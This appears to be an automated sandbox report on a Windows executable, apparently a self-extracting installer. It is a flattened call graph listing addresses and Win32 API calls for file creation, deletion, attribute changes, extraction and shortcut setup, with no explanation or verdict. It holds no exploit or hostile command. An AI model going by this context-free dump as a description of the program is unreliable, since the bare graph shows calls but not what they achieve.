12033->12032 12046 40b2b0 12033->12046 12036 41698a ??3@YAXPAX 12036->12032 12038 416973 memmove 12039 4168f6 12038->12039 12039->12036 12039->12038 12040 41699f memcpy 12039->12040 12041 416995 ??3@YAXPAX 12039->12041 12042 412a6a 3 API calls 12040->12042 12041->12032 12042->12041 12054 413af5 12043->12054 12047 40b300 memcpy 12046->12047 12048 40b2bd 12046->12048 12047->12039 12049 40b2c2 ??2@YAPAXI 12048->12049 12050 40b2eb 12048->12050 12051 40b2d4 memmove 12049->12051 12052 40b2ed ??3@YAXPAX 12049->12052 12050->12052 12051->12052 12052->12047 12055 413b39 12054->12055 12056 413b07 12054->12056 12055->12033 12056->12055 12058 412a36 GetLastError 12056->12058 12059 413465 12056->12059 12058->12056 12060 41348a 12059->12060 12061 4134a6 12060->12061 12063 413512 12060->12063 12061->12056 12064 4134c7 SetFilePointer GetLastError GetLastError EnterCriticalSection LeaveCriticalSection 12063->12064 12065 413536 12064->12065 12065->12061 12077 4180ff 12066->12077 12563 41599a 12069->12563 12099 4157f1 12077->12099 12222 415762 12099->12222 12223 4127e6 ctype 2 API calls 12222->12223 12224 41576b 12223->12224 12225 4127e6 ctype 2 API calls 12224->12225 12226 415773 12225->12226 12227 4127e6 ctype 2 API calls 12226->12227 12228 41577b 12227->12228 12229 4127e6 ctype 2 API calls 12228->12229 12230 415783 12229->12230 12231 4127e6 ctype 2 API calls 12230->12231 12232 41578b 12231->12232 12233 4127e6 ctype 2 API calls 12232->12233 12234 415793 12233->12234 12235 4127e6 ctype 2 API calls 12234->12235 12236 41579d 12235->12236 12237 4127e6 ctype 2 API calls 12236->12237 12238 4157a5 12237->12238 12239 4127e6 ctype 2 API calls 12238->12239 12240 4157b2 12239->12240 12241 4127e6 ctype 2 API calls 12240->12241 12242 4157ba 12241->12242 12243 4127e6 ctype 2 API calls 12242->12243 12244 4157c7 12243->12244 12245 4127e6 ctype 2 API calls 12244->12245 12246 4157cf 12245->12246 12247 4127e6 ctype 2 API calls 12246->12247 12248 4157dc 12247->12248 12249 4127e6 ctype 2 API calls 12248->12249 12250 4157e4 12249->12250 12564 4127e6 ctype 2 API calls 12563->12564 12565 4159a8 12564->12565 12586 4010bd 12580->12586 12583 4014eb 2 API calls 12584 40152f 12583->12584 12584->11995 12585->11999 12587 4083ea 4 API calls 12586->12587 12588 4010c5 12587->12588 12588->12583 12590 401893 12589->12590 12591 401403 2 API calls 12590->12591 12592 4018a0 12591->12592 12593 401795 2 API calls 12592->12593 12594 4018a9 CreateThread 12593->12594 12595 4018d8 12594->12595 12596 4018dd WaitForSingleObject 12594->12596 12613 40133c 12594->12613 12599 408caa 25 API calls 12595->12599 12597 4018fa 12596->12597 12598 40192c 12596->12598 12600 401918 12597->12600 12604 401909 12597->12604 12601 401928 12598->12601 12602 401934 GetExitCodeThread 12598->12602 12599->12596 12605 409606 57 API calls 12600->12605 12601->11422 12603 40194b 12602->12603 12603->12601 12603->12604 12606 40197a SetLastError 12603->12606 12604->12601 12607 409606 57 API calls 12604->12607 12605->12601 12606->12604 12607->12601 12609 4014eb 2 API calls 12608->12609 12610 4016fb 12609->12610 12611 4014eb 2 API calls 12610->12611 12612 401707 12611->12612 12612->11416 12614 401345 12613->12614 12615 401358 12613->12615 12614->12615 12616 401347 Sleep 12614->12616 12617 401391 12615->12617 12618 401383 EndDialog 12615->12618 12616->12614 12618->12617 12620 402701 12619->12620 12620->11426 12621->11488 12623 402965 lstrcmpW 12622->12623 12624 40298d 12622->12624 12625 40297c 12623->12625 12624->11554 12625->12623 12625->12624 12626->11554 12628 403041 12627->12628 12629 403035 12627->12629 12631 402b19 2 API calls 12628->12631 12645 401ed5 GetStdHandle WriteFile 12629->12645 12634 40304b 12631->12634 12632 40303c 12644 402990 ??3@YAXPAX ??3@YAXPAX 12632->12644 12633 403076 12635 402dce 3 API calls 12633->12635 12634->12633 12637 402c21 2 API calls 12634->12637 12636 403088 12635->12636 12638 403096 12636->12638 12639 4030aa 12636->12639 12637->12634 12640 409606 57 API calls 12638->12640 12641 409606 57 API calls 12639->12641 12642 4030a5 ??3@YAXPAX ??3@YAXPAX 12640->12642 12641->12642 12642->12632 12644->11541 12645->12632 12647 402b19 2 API calls 12646->12647 12648 402e25 12647->12648 12649 402e61 12648->12649 12652 402b97 12648->12652 12649->11578 12653 402ba3 12652->12653 12654 402ba9 WideCharToMultiByte 12652->12654 12655 402805 2 API calls 12653->12655 12654->12649 12655->12654 12657 4013d1 2 API calls 12656->12657 12658 402cbb 12657->12658 12659 4013d1 2 API calls 12658->12659 12660 402cc7 12659->12660 12660->11594 12662 4084d0 12661->12662 12663 4084d5 12661->12663 12662->11607 12663->12662 12664 40844b 22 API calls 12663->12664 12664->12662 12665->11607 12666->11626 12667->11625 12668->11628 12669->11629 12670->11634 12671->11638 12672->11642 12673->11646 12674->11653 12676 4083ea 4 API calls 12675->12676 12677 4085e6 12676->12677 12677->11662 12679 4010bd 4 API calls 12678->12679 12680 4085ff 12679->12680 12680->11663 12681->11666 12682->11674 12684 4083ea 4 API calls 12683->12684 12685 408634 12684->12685 12685->11692 12686->11695 13173 418c06 13182 414368 13173->13182 13176 4127e6 ctype 2 API calls 13181 418c26 13176->13181 13177 418c6a 13181->13177 13191 4184f5 ??2@YAPAXI 13181->13191 13195 4142fb 13181->13195 13202 413851 13181->13202 13209 413ef7 13182->13209 13185 413ef7 6 API calls 13186 414382 13185->13186 13214 418adb 13186->13214 13189 418adb 6 API calls 13190 41439a 13189->13190 13190->13176 13192 418504 13191->13192 13193 416407 4 API calls 13192->13193 13194 41851f 13193->13194 13194->13181 13229 407531 13195->13229 13198 407531 2 API calls 13199 414310 13198->13199 13200 407531 2 API calls 13199->13200 13201 414316 13200->13201 13201->13181 13233 4075df 13202->13233 13205 41387c 13205->13181 13206 4075df 2 API calls 13207 41386c 13206->13207 13207->13205 13208 4075df 2 API calls 13207->13208 13208->13205 13210 4127e6 ctype 2 API calls 13209->13210 13211 413eff 13210->13211 13219 413cd1 13211->13219 13215 4127e6 ctype 2 API calls 13214->13215 13216 418ae3 13215->13216 13224 41854a 13216->13224 13220 41271d 4 API calls 13219->13220 13221 413ce9 13220->13221 13222 413d05 13221->13222 13223 4163dd 4 API calls 13221->13223 13222->13185 13223->13221 13225 41271d 4 API calls 13224->13225 13226 418562 13225->13226 13227 41438e 13226->13227 13228 416407 4 API calls 13226->13228 13227->13189 13228->13226 13230 40753c CloseHandle 13229->13230 13232 407551 13229->13232 13231 407547 GetLastError 13230->13231 13230->13232 13231->13232 13232->13198 13236 407591 CreateEventW 13233->13236 13239 40751b 13236->13239 13238 4075b5 13238->13205 13238->13206 13240 407522 13239->13240 13241 407525 GetLastError 13239->13241 13240->13238 13242 40752f 13241->13242 13242->13238 14038 412f0c 14042 412f19 14038->14042 14039 412fb2 14040 412f40 memcpy 14040->14042 14042->14039 14042->14040 14043 412b55 14042->14043 14044 412b5f 14043->14044 14045 413b69 110 API calls 14044->14045 14046 412b8e 14045->14046 14046->14042 14068 405b1f 14069 402a67 2 API calls 14068->14069 14070 405b33 14069->14070 14071 4041b2 7 API calls 14070->14071 14072 405b41 14071->14072 14090 40426d 14072->14090 14074 405b50 14113 404328 14074->14113 14076 405b5f 14136 4043e3 14076->14136 14078 405be5 14155 403b54 14078->14155 14082 402e67 6 API calls 14087 405b68 14082->14087 14083 4041b2 7 API calls 14083->14087 14084 40426d 7 API calls 14084->14087 14085 404328 7 API calls 14085->14087 14086 4043e3 4 API calls 14086->14087 14087->14078 14087->14082 14087->14083 14087->14084 14087->14085 14087->14086 14141 403573 GetEnvironmentVariableW 14087->14141 14149 405aaf 14087->14149 14091 4014eb 2 API calls 14090->14091 14092 40427b 14091->14092 14093 40143c 2 API calls 14092->14093 14094 404286 14093->14094 14095 402ab8 2 API calls 14094->14095 14096 404293 14095->14096 14097 402a67 2 API calls 14096->14097 14098 4042a0 14097->14098 14099 404137 3 API calls 14098->14099 14100 4042b0 ??3@YAXPAX 14099->14100 14101 40143c 2 API calls 14100->14101 14102 4042c4 14101->14102 14103 402ab8 2 API calls 14102->14103 14104 4042d1 14103->14104 14105 402a67 2 API calls 14104->14105 14106 4042de 14105->14106 14107 404137 3 API calls 14106->14107 14108 4042ee ??3@YAXPAX 14107->14108 14109 402a67 2 API calls 14108->14109 14110 404305 14109->14110 14111 404137 3 API calls 14110->14111 14112 404314 ??3@YAXPAX ??3@YAXPAX 14111->14112 14112->14074 14114 4014eb 2 API calls 14113->14114 14115 404336 14114->14115 14116 40143c 2 API calls 14115->14116 14117 404341 14116->14117 14118 402ab8 2 API calls 14117->14118 14119 40434e 14118->14119 14120 402a67 2 API calls 14119->14120 14121 40435b 14120->14121 14122 404137 3 API calls 14121->14122 14123 40436b ??3@YAXPAX 14122->14123 14124 40143c 2 API calls 14123->14124 14125 40437f 14124->14125 14126 402ab8 2 API calls 14125->14126 14127 40438c 14126->14127 14128 402a67 2 API calls 14127->14128 14129 404399 14128->14129 14130 404137 3 API calls 14129->14130 14131 4043a9 ??3@YAXPAX 14130->14131 14132 402a67 2 API calls 14131->14132 14133 4043c0 14132->14133 14134 404137 3 API calls 14133->14134 14135 4043cf ??3@YAXPAX ??3@YAXPAX 14134->14135 14135->14076 14137 402a67 2 API calls 14136->14137 14138 4043f6 14137->14138 14139 404137 3 API calls 14138->14139 14140 404407 ??3@YAXPAX 14139->14140 14140->14087 14142 4014eb 2 API calls 14141->14142 14143 403597 14142->14143 14144 402aa0 2 API calls 14143->14144 14145 4035a5 14144->14145 14146 402aa0 2 API calls 14145->14146 14147 4035b1 GetEnvironmentVariableW 14146->14147 14148 4035bf 14147->14148 14148->14087 14150 405b1a ??3@YAXPAX 14149->14150 14153 405ac5 14149->14153 14150->14078 14150->14087 14151 401f6a CharUpperW 14151->14153 14152 402cce memmove 14152->14153 14153->14150 14153->14151 14153->14152 14154 4035f9 3 API calls 14153->14154 14154->14153 14156 403b71 14155->14156 14158 403b7d 14155->14158 14157 403b77 _wtol 14156->14157 14156->14158 14157->14158 14159 403c11 SHGetSpecialFolderPathW 14158->14159 14160 403e91 ??3@YAXPAX 14158->14160 14159->14160 14161 403c29 14159->14161 14162 402a67 2 API calls 14161->14162 14163 403c38 14162->14163 14164 4014eb 2 API calls 14163->14164 14165 403c40 14164->14165 14166 4014eb 2 API calls 14165->14166 14167 403c48 14166->14167 14168 4014eb 2 API calls 14167->14168 14169 403c50 14168->14169 14170 4014eb 2 API calls 14169->14170 14171 403c58 14170->14171 14172 4014eb 2 API calls 14171->14172 14173 403c60 14172->14173 14174 4014eb 2 API calls 14173->14174 14175 403c68 14174->14175 14176 4014eb 2 API calls 14175->14176 14177 403c70 14176->14177 14178 4014eb 2 API calls 14177->14178 14179 403c78 14178->14179 14216 403333 14179->14216 14182 403cc9 14185 403333 2 API calls 14182->14185 14183 403c89 7 API calls 14184 403e81 ??3@YAXPAX ??3@YAXPAX 14183->14184 14184->14160 14186 403cd3 14185->14186 14187 403333 2 API calls 14186->14187 14188 403cdd 14187->14188 14189 403333 2 API calls 14188->14189 14190 403ce7 14189->14190 14191 403333 2 API calls 14190->14191 14192 403cf1 14191->14192 14193 403333 2 API calls 14192->14193 14194 403cfb 14193->14194 14195 403333 2 API calls 14194->14195 14196 403d05 14195->14196 14197 403333 2 API calls 14196->14197 14198 403d0f _wtol 14197->14198 14199 403d21 14198->14199 14206 403d38 14198->14206 14203 401403 2 API calls 14199->14203 14200 401795 2 API calls 14201 403d5a 14200->14201 14202 403d75 14201->14202 14204 4014bc 2 API calls 14201->14204 14205 4039e7 88 API calls 14202->14205 14203->14206 14207 403d6b 14204->14207 14208 403d7d 14205->14208 14206->14200 14209 401795 2 API calls 14207->14209 14210 403e48 7 API calls 14208->14210 14211 4014bc 2 API calls 14208->14211 14209->14202 14210->14184 14212 403d92 14211->14212 14213 402ab8 2 API calls 14212->14213 14214 403d9f CoCreateInstance 14213->14214 14214->14210 14215 403dc1 14214->14215 14215->14210 14218 40334d 14216->14218 14217 403392 14217->14182 14217->14183 14218->14217 14219 401795 2 API calls 14218->14219 14219->14218 14220 41872c 14221 418737 14220->14221 14222 418748 14220->14222 14221->14222 14224 413880 14221->14224 14229 4075cb ResetEvent 14224->14229 14227 4075cb 2 API calls 14228 413899 14227->14228 14228->14221 14230 40751b GetLastError 14229->14230 14231 4075dd 14230->14231 14231->14227 10343 4120c0 10344 4120ce 10343->10344 10349 4120d8 10343->10349 10364 402a2f 10344->10364 10348 4120e2 10349->10348 10350 411f90 10349->10350 10357 413b69 10349->10357 10352 411fb6 10350->10352 10356 411fa0 10350->10356 10351 411fdb 10351->10349 10352->10351 10369 411000 10352->10369 10354 411fae 10354->10349 10356->10354 10372 411a40 10356->10372 10358 413b75 10357->10358 10359 413ba9 10357->10359 10358->10359 10384 415588 10358->10384 10390 41247f SetFileTime 10358->10390 10391 41229a 10358->10391 10394 4012ab 10358->10394 10359->10349 10743 4029c5 10364->10743 10367 402a3d 10367->10349 10368 402a3e VirtualAlloc 10368->10349 10377 410e70 memset 10369->10377 10374 411a5d 10372->10374 10373 411a7d 10373->10356 10374->10373 10379 4111d0 10374->10379 10376 411dfa 10376->10356 10378 410ecc 10377->10378 10378->10356 10380 4111f3 10379->10380 10381 410e70 memset 10380->10381 10382 411286 10380->10382 10383 41127e 10381->10383 10382->10376 10383->10376 10387 415594 10384->10387 10385 415641 10385->10358 10387->10385 10388 415549 106 API calls 10387->10388 10400 418eab 10387->10400 10404 415428 10387->10404 10388->10387 10390->10358 10392 4122a4 CloseHandle 10391->10392 10393 4122af 10391->10393 10392->10393 10393->10358 10395 4012bf 10394->10395 10398 4012b3 10394->10398 10397 4012dc 10395->10397 10739 41249c 10395->10739 10397->10398 10399 4012e9 SetFileAttributesW 10397->10399 10398->10358 10399->10398 10401 418ebc 10400->10401 10402 418ecc 10400->10402 10409 412ace 10401->10409 10402->10387 10405 415442 10404->10405 10421 412434 10405->10421 10424 401b0b 10405->10424 10406 415476 10406->10387 10414 4124ac 10409->10414 10411 412ae7 10417 4129fa 10411->10417 10413 412b06 10413->10402 10415 4124ba 10414->10415 10416 4124bd WriteFile 10414->10416 10415->10416 10416->10411 10418 412a01 10417->10418 10419 412a04 GetLastError 10417->10419 10418->10413 10420 412a0e 10419->10420 10420->10413 10485 41236b 10421->10485 10425 401b27 10424->10425 10430 401b1d 10424->10430 10426 401b54 10425->10426 10490 4014eb 10425->10490 10515 412574 10426->10515 10430->10406 10431 401e47 ??3@YAXPAX 10435 412574 VariantClear 10431->10435 10432 401b82 10493 401403 10432->10493 10435->10430 10436 401b8d 10497 4017c0 10436->10497 10440 401bac ??3@YAXPAX 10441 401e0d ??3@YAXPAX 10440->10441 10447 401bbe 10440->10447 10443 412574 VariantClear 10441->10443 10443->10430 10444 401bdf 10445 412574 VariantClear 10444->10445 10446 401be7 ??3@YAXPAX 10445->10446 10446->10426 10447->10444 10448 401c49 10447->10448 10449 401c0a 10447->10449 10452 401c87 10448->10452 10453 401c6e 10448->10453 10450 412574 VariantClear 10449->10450 10451 401c1c ??3@YAXPAX 10450->10451 10451->10426 10455 401ca9 GetLocalTime SystemTimeToFileTime 10452->10455 10456 401c8f 10452->10456 10454 412574 VariantClear 10453->10454 10457 401c76 ??3@YAXPAX 10454->10457 10455->10456 10456->10449 10458 401cc6 10456->10458 10459 401cdd 10456->10459 10457->10426 10519 4039e7 lstrlenW 10458->10519 10506 40367d GetFileAttributesW 10459->10506 10463 401e19 GetLastError 10463->10441 10464 401cfd ??2@YAPAXI 10466 401d09 10464->10466 10465 401e0f 10465->10463 10543 412468 10466->10543 10469 401df4 10472 412574 VariantClear 10469->10472 10470 401d44 GetLastError 10546 4013d1 10470->10546 10472->10441 10473 401d56 10474 4039e7 88 API calls 10473->10474 10477 401d64 ??3@YAXPAX 10473->10477 10475 401db1 10474->10475 10475->10477 10479 412468 2 API calls 10475->10479 10478 401d81 10477->10478 10480 412574 VariantClear 10478->10480 10482 401dd6 10479->10482 10481 401d8f ??3@YAXPAX 10480->10481 10481->10426 10483 401dda GetLastError 10482->10483 10484 401deb ??3@YAXPAX 10482->10484 10483->10477 10484->10469 10486 41229a CloseHandle 10485->10486 10487 412376 10486->10487 10488 41237a CreateFileW 10487->10488 10489 41239f 10487->10489 10488->10489 10489->10406 10549 4011b7 10490->10549 10494 40141a 10493->10494 10495 4011b7 2 API calls 10494->10495 10496 401425 10495->10496 10496->10436 10498 4013d1 2 API calls 10497->10498 10499 4017ce 10498->10499 10554 4014bc 10499->10554 10501 4017d9 10502 40143c 10501->10502 10503 401448 10502->10503 10505 40145a 10502->10505 10504 4011b7 2 API calls 10503->10504 10504->10505 10505->10440 10507 401ce9 10506->10507 10508 40369a 10506->10508 10507->10463 10507->10464 10507->10465 10509 4036ab 10508->10509 10510 40369e SetLastError 10508->10510 10509->10507 10511 4036b4 10509->10511 10513 4036c2 FindFirstFileW 10509->10513 10510->10507 10561 403650 10511->10561 10513->10511 10514 4036d5 FindClose CompareFileTime 10513->10514 10514->10507 10514->10511 10518 412530 10515->10518 10516 412568 10516->10430 10517 412551 VariantClear 10517->10430 10518->10516 10518->10517 10520 402a67 2 API calls 10519->10520 10521 403a08 10520->10521 10522 4011b7 2 API calls 10521->10522 10530 403a18 10521->10530 10522->10530 10524 403a66 GetSystemTimeAsFileTime GetFileAttributesW 10525 403a85 10524->10525 10526 403a7b 10524->10526 10529 401e6b 4 API calls 10525->10529 10533 403a8b ??3@YAXPAX 10525->10533 10528 40367d 22 API calls 10526->10528 10527 403b0a 10531 403b3a 10527->10531 10527->10533 10528->10525 10541 403a98 10529->10541 10530->10524 10530->10527 10610 401e6b CreateDirectoryW 10530->10610 10532 409606 57 API calls 10531->10532 10537 403b44 ??3@YAXPAX 10532->10537 10540 403b4f 10533->10540 10534 403a9d 10616 409606 10534->10616 10535 403ab0 memcpy 10535->10541 10536 403afe ??3@YAXPAX 10536->10540 10537->10540 10540->10449 10541->10534 10541->10535 10541->10536 10542 401e6b 4 API calls 10541->10542 10542->10541 10736 412451 10543->10736 10547 4011b7 2 API calls 10546->10547 10548 4013eb 10547->10548 10548->10473 10550 401203 10549->10550 10551 4011c5 ??2@YAPAXI 10549->10551 10550->10431 10550->10432 10551->10550 10552 4011e6 ??3@YAXPAX 10551->10552 10552->10550 10557 401472 10554->10557 10556 4014cc 10556->10501 10558 4014b6 10557->10558 10559 401486 10557->10559 10558->10556 10560 4011b7 2 API calls 10559->10560 10560->10558 10567 4032e9 10561->10567 10563 403659 10564 40367a 10563->10564 10565 40365e GetLastError 10563->10565 10564->10507 10566 403669 10565->10566 10566->10507 10568 4032f2 10567->10568 10569 4032f6 GetFileAttributesW 10567->10569 10568->10563 10570 403307 10569->10570 10571 40330c 10569->10571 10570->10563 10572 403310 SetFileAttributesW 10571->10572 10573 40332a 10571->10573 10575 403326 10572->10575 10576 40331d DeleteFileW 10572->10576 10578 4031dc 10573->10578 10575->10563 10576->10563 10599 402a67 10578->10599 10580 4031f3 10603 402ab8 10580->10603 10582 403200 FindFirstFileW 10583 4032b8 SetFileAttributesW 10582->10583 10597 403222 10582->10597 10585 4032c3 RemoveDirectoryW 10583->10585 10586 4032db ??3@YAXPAX 10583->10586 10584 401403 2 API calls 10584->10597 10585->10586 10587 4032d0 ??3@YAXPAX 10585->10587 10588 4032e3 10586->10588 10587->10588 10588->10563 10590 402ab8 2 API calls 10590->10597 10591 403252 lstrcmpW 10594 403268 lstrcmpW 10591->10594 10595 40329b FindNextFileW 10591->10595 10592 403287 SetFileAttributesW 10592->10586 10593 403290 DeleteFileW 10592->10593 10593->10597 10594->10595 10594->10597 10596 4032b1 FindClose 10595->10596 10595->10597 10596->10583 10597->10584 10597->10586 10597->10590 10597->10591 10597->10592 10597->10595 10598 4031dc 2 API calls 10597->10598 10607 401795 10597->10607 10598->10597 10600 402a7e 10599->10600 10601 4011b7 2 API calls 10600->10601 10602 402a89 10601->10602 10602->10580 10604 402ac5 10603->10604 10605 401472 2 API calls 10604->10605 10606 402ad0 10605->10606 10606->10582 10608 401472 2 API calls 10607->10608 10609 40179f 10608->10609 10609->10597 10611 401eac 10610->10611 10612 401e7c GetLastError 10610->10612 10611->10530 10613 401e96 GetFileAttributesW 10612->10613 10615 401e8b 10612->10615 10613->10611 10613->10615 10614 401e8c SetLastError 10614->10530 10615->10611 10615->10614 10627 40247d 10616->10627 10619 4096e9 10623 409522 27 API calls 10619->10623 10620 40963b GetLastError FormatMessageW 10621 409669 FormatMessageW 10620->10621 10622 40967e lstrlenW lstrlenW ??2@YAPAXI lstrcpyW lstrcpyW 10620->10622 10621->10619 10621->10622 10647 409522 10622->10647 10625 4096f5 10623->10625 10625->10533 10628 402494 10627->10628 10629 4024c5 GetLastError wsprintfW GetEnvironmentVariableW GetLastError 10628->10629 10630 4024bb wvsprintfW 10628->10630 10631 402575 SetLastError 10629->10631 10632 4024fd ??2@YAPAXI GetEnvironmentVariableW 10629->10632 10630->10619 10630->10620 10631->10630 10636 40258c 10631->10636 10633 40252c GetLastError 10632->10633 10646 40255e ??3@YAXPAX 10632->10646 10637 402532 10633->10637 10633->10646 10635 4025ab lstrlenA ??2@YAPAXI 10640 402616 MultiByteToWideChar 10635->10640 10641 4025dc GetLocaleInfoW 10635->10641 10636->10635 10657 402427 10636->10657 10638 402561 10637->10638 10642 40253c lstrcmpiW 10637->10642 10638->10631 10640->10630 10641->10640 10644 402603 _wtol 10641->10644 10645 40254b ??3@YAXPAX 10642->10645 10642->10646 10643 4025a1 10643->10635 10644->10640 10645->10638 10646->10638 10648 409531 10647->10648 10649 409597 ??3@YAXPAX LocalFree 10647->10649 10664 4083ea 10648->10664 10649->10625 10652 409569 10669 40844b 10652->10669 10653 409557 IsBadReadPtr 10653->10652 10658 402431 GetUserDefaultUILanguage 10657->10658 10659 402475 10657->10659 10660 402452 GetSystemDefaultUILanguage 10658->10660 10661 40244e 10658->10661 10659->10643 10660->10659 10662 40245e GetSystemDefaultLCID 10660->10662 10661->10643 10662->10659 10663 40246e 10662->10663 10663->10659 10665 4014eb 2 API calls 10664->10665 10666 4083fb 10665->10666 10667 408447 IsWindow 10666->10667 10668 408423 GetSystemMetrics GetSystemMetrics 10666->10668 10667->10652 10667->10653 10668->10667 10670 40845a 10669->10670 10671 4084be 10669->10671 10670->10671 10672 402a67 2 API calls 10670->10672 10681 4081be ??3@YAXPAX 10671->10681 10673 40846b 10672->10673 10674 402a67 2 API calls 10673->10674 10675 408476 10674->10675 10682 4044e2 10675->10682 10678 4044e2 20 API calls 10679 408488 ??3@YAXPAX ??3@YAXPAX 10678->10679 10679->10671 10681->10649 10689 402e67 10682->10689 10686 4044fa 10725 4044ae 10686->10725 10690 4014eb ??2@YAPAXI ??3@YAXPAX 10689->10690 10691 402e75 10690->10691 10692 402e85 ExpandEnvironmentStringsW 10691->10692 10693 4011b7 ??2@YAPAXI ??3@YAXPAX 10691->10693 10694 402ea9 10692->10694 10695 402e9e ??3@YAXPAX 10692->10695 10693->10692 10696 402aa0 ??2@YAPAXI ??3@YAXPAX 10694->10696 10697 402ee0 10695->10697 10698 402eb7 ExpandEnvironmentStringsW 10696->10698 10702 4041b2 10697->10702 10699 402ec4 10698->10699 10700 40143c ??2@YAPAXI ??3@YAXPAX 10699->10700 10701 402ed8 ??3@YAXPAX 10700->10701 10701->10697 10703 4014eb ??2@YAPAXI ??3@YAXPAX 10702->10703 10704 4041c0 10703->10704 10705 40143c ??2@YAPAXI ??3@YAXPAX 10704->10705 10706 4041cb 10705->10706 10707 402ab8 ??2@YAPAXI ??3@YAXPAX 10706->10707 10708 4041d8 10707->10708 10709 402a67 ??2@YAPAXI ??3@YAXPAX 10708->10709 10710 4041e5 10709->10710 10711 404137 ??2@YAPAXI ??3@YAXPAX memmove 10710->10711 10712 4041f5 ??3@YAXPAX 10711->10712 10713 40143c ??2@YAPAXI ??3@YAXPAX 10712->10713 10714 404209 10713->10714 10715 402ab8 ??2@YAPAXI ??3@YAXPAX 10714->10715 10716 404216 10715->10716 10717 402a67 ??2@YAPAXI ??3@YAXPAX 10716->10717 10718 404223 10717->10718 10719 404137 ??2@YAPAXI ??3@YAXPAX memmove 10718->10719 10720 404233 ??3@YAXPAX 10719->10720 10721 402a67 ??2@YAPAXI ??3@YAXPAX 10720->10721 10722 40424a 10721->10722 10723 404137 ??2@YAPAXI ??3@YAXPAX memmove 10722->10723 10724 404259 ??3@YAXPAX ??3@YAXPAX 10723->10724 10724->10686 10726 402e67 6 API calls 10725->10726 10727 4044b9 10726->10727 10728 40426d 7 API calls 10727->10728 10729 4044c6 10728->10729 10730 404328 7 API calls 10729->10730 10731 4044d1 10730->10731 10732 4043e3 ??2@YAPAXI ??3@YAXPAX memmove ??3@YAXPAX 10731->10732 10733 4044d7 10732->10733 10734 402e67 6 API calls 10733->10734 10735 4044dd 10734->10735 10735->10678 10737 412434 2 API calls 10736->10737 10738 401d3c 10737->10738 10738->10469 10738->10470 10742 41247f SetFileTime 10739->10742 10741 4124a9 10741->10397 10742->10741 10744 4029d5 10743->10744 10750 4029d1 10743->10750 10745 4029e5 GlobalMemoryStatusEx 10744->10745 10744->10750 10746 4029f3 10745->10746 10745->10750 10747 40247d 19 API calls 10746->10747 10746->10750 10748 402a0d 10747->10748 10751 409599 10748->10751 10750->10367 10750->10368 10752 4083ea 4 API calls 10751->10752 10753 4095a7 IsWindow 10752->10753 10754 4095d0 10753->10754 10755 4095be IsBadReadPtr 10753->10755 10756 40844b 22 API calls 10754->10756 10755->10754 10757 4095f7 10756->10757 10760 4081be ??3@YAXPAX 10757->10760 10759 409601 10759->10750 10760->10759 12687 414dcf _EH_prolog 12698 414e02 12687->12698 12688 414f2f 12718 40122a 12688->12718 12690 414f44 12732 414b2d 12690->12732 12691 414f59 12694 414f66 ??2@YAPAXI 12691->12694 12692 414be8 _CxxThrowException ??2@YAPAXI memcpy ??3@YAXPAX 12692->12698 12709 414f80 12694->12709 12695 414da5 7 API calls 12695->12698 12696 414b0b 4 API calls 12696->12698 12697 412885 VirtualFree ??3@YAXPAX ??3@YAXPAX ctype 12697->12698 12698->12688 12698->12692 12698->12695 12698->12696 12698->12697 12699 414cbf _CxxThrowException 12698->12699 12708 414e24 12698->12708 12699->12698 12700 414fca 12702 414c38 2 API calls 12700->12702 12701 41502d ??2@YAPAXI 12701->12709 12705 414fe2 12702->12705 12703 414c38 2 API calls 12703->12709 12706 414b2d ctype 2 API calls 12705->12706 12706->12708 12707 414b2d ctype 2 API calls 12707->12709 12709->12700 12709->12701 12709->12703 12709->12707 12709->12708 12714 414491 151 API calls 12709->12714 12715 4150aa 12709->12715 12728 4156e6 12709->12728 12735 415346 ??2@YAPAXI 12709->12735 12737 415693 12709->12737 12711 414c38 2 API calls 12712 4150cf 12711->12712 12713 414b2d ctype 2 API calls 12712->12713 12713->12708 12714->12709 12715->12711 12719 401238 GetDiskFreeSpaceExW 12718->12719 12720 40128e SendMessageW 12718->12720 12719->12720 12721 401250 12719->12721 12726 401276 12720->12726 12721->12720 12722 40247d 19 API calls 12721->12722 12723 401269 12722->12723 12724 409599 27 API calls 12723->12724 12725 40126f 12724->12725 12725->12726 12727 401287 12725->12727 12726->12690 12726->12691 12727->12720 12729 41570f 12728->12729 12741 415549 12729->12741 12733 4127e6 ctype 2 API calls 12732->12733 12734 414b3b 12733->12734 12736 415378 12735->12736 12736->12709 12739 415698 12737->12739 12738 4156bf 12738->12709 12739->12738 12740 415428 106 API calls 12739->12740 12740->12739 12744 41554e 12741->12744 12742 415584 12742->12709 12743 415428 106 API calls 12743->12744 12744->12742 12744->12743 10342 4123f1 ReadFile 13783 419c90 13788 407613 InitializeCriticalSection 13783->13788 13785 419c9a 13786 4192a8 2 API calls 13785->13786 13787 419ca4 13786->13787 13788->13785 10761 401198 SysAllocString 14773 404ba6 14776 404bbb 14773->14776 14774 404be9 14775 412833 memmove 14774->14775 14777 404bf7 14775->14777 14776->14774 14780 402990 ??3@YAXPAX ??3@YAXPAX 14776->14780 14779 404bda ??3@YAXPAX 14779->14776 14780->14779 14823 4015ac 14824 401556 6 API calls 14823->14824 14825 4015b9 14824->14825 14827 4015bd 14825->14827 14828 401198 SysAllocString 14825->14828 14828->14827
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ?_set_new_handler@@YAP6AHI@ZP6AHI@Z@Z.MSVCRT ref: 00405C0F
                                                                                                                                                                                                                                            • Part of subcall function 00402017: GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00405C1B,?,00000000), ref: 00402023
                                                                                                                                                                                                                                            • Part of subcall function 00402017: CreateWindowExW.USER32(00000000,Static,0041A584,00000000,000000F6,000000F6,00000005,00000005,00000000,00000000,00000000), ref: 00402040
                                                                                                                                                                                                                                            • Part of subcall function 00402017: SetTimer.USER32(00000000,00000001,00000001,00000000), ref: 00402052
                                                                                                                                                                                                                                            • Part of subcall function 00402017: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0040205F
                                                                                                                                                                                                                                            • Part of subcall function 00402017: DispatchMessageW.USER32(?), ref: 00402069
                                                                                                                                                                                                                                            • Part of subcall function 00402017: KillTimer.USER32(00000000,00000001,?,?,?,?,?,?,00405C1B,?,00000000), ref: 00402072
                                                                                                                                                                                                                                            • Part of subcall function 00402017: KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,?,00405C1B,?,00000000), ref: 00402079
                                                                                                                                                                                                                                          • GetVersionExW.KERNEL32(?,?,00000000), ref: 00405C2C
                                                                                                                                                                                                                                          • GetCommandLineW.KERNEL32(?,00000020,?,00000000), ref: 00405CBB
